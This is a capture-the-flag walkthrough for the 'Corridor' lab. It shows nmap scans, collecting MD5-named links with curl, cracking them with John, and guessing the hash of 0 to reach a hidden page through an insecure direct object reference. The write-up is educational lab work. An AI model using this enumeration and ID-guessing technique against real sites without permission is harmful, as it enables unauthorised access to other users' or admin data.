CTF Writeup / Walkthrough for Corridor | Can you escape the Corridor?
Last updated
Was this helpful?
IDORWebSecurity
Letβs add the target IP to our host file, in /etc/host
I always make the IP as target.local in /etc/host so that I donβt have to type IP address all the time when engaging for example: in /etc/host I have the following
We will use N-map and Directory enumeration to get an initial overview of the target
since we are doing a stealth scan we need to use sudo
sudo nmap -sCSV -p- -Pn target.local
Command Parameterβs Explanation :
-sC : Run scripts when nmap finds an open port
-sS : Do an SYN Scan, or stealth scan, to evade Firewalls
-sV : Get the version of the service that is running on the that particular port
-p- : Look for all ports
-Pn : Treat all hosts as online -- skip host discovery
The following should be the expected output
Nmap scan report for target.local
Host is up (0.16s latency).
Not shown: 65518 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor
7936/tcp filtered unknown
15239/tcp filtered unknown
20884/tcp filtered unknown
24144/tcp filtered unknown
35478/tcp filtered unknown
39063/tcp filtered vroa
48519/tcp filtered unknown
50423/tcp filtered unknown
51278/tcp filtered unknown
52203/tcp filtered unknown
54695/tcp filtered unknown
56706/tcp filtered unknown
59725/tcp filtered unknown
62079/tcp filtered unknown
63530/tcp filtered unknown
64701/tcp filtered unknown
Letβs see if there are any UDP Ports that are available for us
sudo nmap -sCSVU -p- -Pn target.local
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
# It seems that all the ports are filtered and most of it's not required, so let's just focus on one port
PORT STATE SERVICE VERSION
80/tcp open http Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor
# It seems that the service is running a python server,
# not much to exploit, it just serves a simple webpage
If we visit target.local it seems that the website only consists of pictures with links, which looks very similar to hashes
A quick one-line bash command will give us the list of all hashes that are available in that particular page
curl target.local | grep -o 'alt="[a-z0-9]\{32\}"' | awk -F '"' '{print $2}'
# This shall generate the following output
<--
c4ca4238a0b923820dcc509a6f75849b
c81e728d9d4c2f636f067f89cc14862c
eccbc87e4b5ce2fe28308fd9f2a7baf3
--
Letβs Check what kind of hash is being used
Use this tool :
Attack Phase
Let's use John to crack the hash or you can use the online decrypter such as
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5
# We now have a list of numbers from the hashes
<--
1679091c5a880faf6fb5e6087eb1b2dc:6
45c48cce2e2d7fbdea1afc51c7c6ad26:9
8f14e45fceea167a5a36dedd4bea2543:7
--
Letβs find the missing number, we can use a simple python program that will allow us to generate a missing number from here
# Find Missing Element
def findMissing(arr, N):
# create a list of zeroes
temp = [0] * (N+1)
for i in range(0, N):
temp[arr[i] - 1] = 1
for i in range(0, N+1):
if(temp[i] == 0):
ans = i + 1
print(ans)
def MissingNo(arr):
n = len(arr)
total = (n + 1)*(n + 2)/2
arr_sum = sum(arr)
print(total - arr_sum)
# Driver code
if __name__ == '__main__':
arr = [6,9,7,4,1,2,8,5,3,11,12,13,10]
N = len(arr)
MissingNo(arr)
# Function call
#findMissing(arr, N)
We have 14 as an output, let's convert it to an md5 hash :
echo -n "14" | md5sum | awk '{print $1}
# the following is the output
aab3238922bcc25a6f606eb525ffdc56
To solve this, let's use a hash of number 0 or -1, a common concept within the IDOR Vulnerability realm that the admin account id is mostly 0 or -1 or 1
let's encode 0 as an md5 hash
echo -n 0 | md5sum | awk '{print $1}
# the following output is generated
cfcd208495d565ef66e7_redacted
# Let us append that to the URL of our target
http://target.local/cfcd208495d565_redacted
Exploitation
Now visit the URL you got: http://target.local/cfcd208495d565_redacted
We should now have the flag : REDACTED_FLAG
Thanks for reading, hope you learned something new π
